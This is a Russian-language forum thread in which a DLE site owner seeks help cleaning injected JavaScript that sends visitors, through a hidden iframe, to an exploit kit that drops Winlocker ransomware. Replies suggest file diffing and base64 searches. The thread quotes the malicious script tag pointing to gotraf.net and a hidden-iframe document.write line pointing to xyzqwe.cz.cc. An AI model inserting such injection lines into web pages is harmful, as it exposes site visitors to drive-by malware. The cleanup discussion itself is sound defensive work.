Вирус попал на сайт (DLE)

Вообщем такая беда. Попал вирус на двиг DLE(непонятно как), судя по всему кто-то сплойтанул и залил скрипт. Видна строчка скрипта - <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://gotraf.net/in.php?id=123"></script>
Но показывается она только гостям, после этого на комп грузится и запускается прога террорист Winlocker. Ни в одном файле скрипт файле не виден. Искал в двиге, базе, все тщетно. Кто сталкивался, подскажите как удалить эту заразу с сайта?
Яндекс перекрыл доступ к сайту.
В каких файлаъ она сидит и какую форму вирус принимает?

 

Дайте доступ в личку, удалю все вирусы.

 

Лучше скажи где может сидеть вирус. Удалить то и сам могу)

 

вирус льется на стороне связки, а твои уники через скрытый ифрейм попадают туда и оттуда уже пробивается сплойтом и загружается файл.

 

shell_c0de, Спс за подробный ответ. Можно узнать как найти этот скрытый инфрейм и удалить?
У меня DLE 8.5 NULLED, везде искал. Не могу никаки найти код.

 

у меня была такая же штука, "вирус" (строка на вредоносный javascript) был почти в каждом файле движка. В итоге я скачал все файла на компьютер, при помощи программы (название не помню) нашел строчку в файлах и заменил ее ничем (программа сделала все сама во всех файлах ). Правда, потом оказалось, что кое-где были экранированные слеши ну и в итоге остатки пришлось дочищать вручную)

 

сам не пробовал просто пройтись по ссылке http://gotraf.net/in.php?id=123 ? )
связка

PHP:

document.write('<iframe src 
="http://xyzqwe.cz.cc/forum.php" width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>');

 

ride, По какой строчке искал?

 

NeXArmAor, у меня в файлах была <script src....></script> по ней и искал.

 

shell_c0de, ну чё ты тупишь!
он спрашивает где ему на серваре своём искать ифрем, он его на сайте видит а в .php нафлах найти не может
вот и спрашивает где его искать

ябы сделал так:
возьми бекап, напиши чекер файлов по md5 чек сумме и пусть сравнивает файлы оригинала с твоими - выловишь изменённые файлы, там и код словишь
если нет бекапа (что врядле, у тебя же на компе должен быть... не?) то скачай эту же версию, и сравнивай
это если не переписывал, если переписывал - заменяй файлы по очереди пока код не пропадёт (ну не совсем по 1, папками заменяй, там выяснишь)

 

а что если тупо обновить файлы движка ?

 

Могу и ошибаться,поскольку DLE не юзал....Возможно ли просмотреть ИСТОРИЮ добавления файлов на сайт?...Последние добавления и будет вредоносом...
Сильно не пинать...мысли вслух...

 

господин Ponchik вы КЭП ? ) а я что посоветовал ? ) он искал сам винлокер а я объяснил что файла на самом серваке нету и через ифрейм (и что там код он сам знает читай первый пост) заливается файл а ему надо просто свои скрипты почистить от злокода и все ...

 

Скачал все файлы по FTP, двиг, шаблоны. Прогнал по возможным сигнам, base64_decode(точнее функции base64 находит в файлах, но где находится тело кода все равно что иголку в стоге сена искать), и прочие хухры мухры. Нифига не нашло. Где же прячется эта гадость ?

shell_c0de, Я скачал все файлы сайта. По какой строке можно найти данную хрень в файле? Она вроде как шифруется иногда. Чисто по gotref.net ничего не находит,.

Gigabajt_, Да дело не в нем видимо.

 

Сделай дамп бд и в нем поищи.

 

ООоо, кажется нашел. Сидит тварь в Language\Russian/website.lng. Сейча вычищу.
Такая строка тут кароче.

Расшифровал base64 самую длинную составляющую через http://www.base64.ru/, вышло вот это:

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://gotraf.net/in.php?id=123"></script>

 

Всем спасибо за советы. Кажется нашел зацепку и в будущем буду знать как убить эту хрень))

У кого приключится подобный сабж, скачивайте все файлы с сайта и чекайте их через Actual Search & Replace со строкой Array(base64.

Тот файл который будет найден и будет зараженным.

 

Нет, ну вот удалишь ты все коды iframe, а толку? Один раз поимели, что им помешает еще раз зайти и все по новой расставить? Я думаю они даже не руками его вставляют...

ps
Нуленый DLE ваще зло.

 

Хотелось бы знать, как этот код проник в файлы, каким способом? Чтобы закрыть эту дыру раз и навсегда.

 

WinMerge в руки!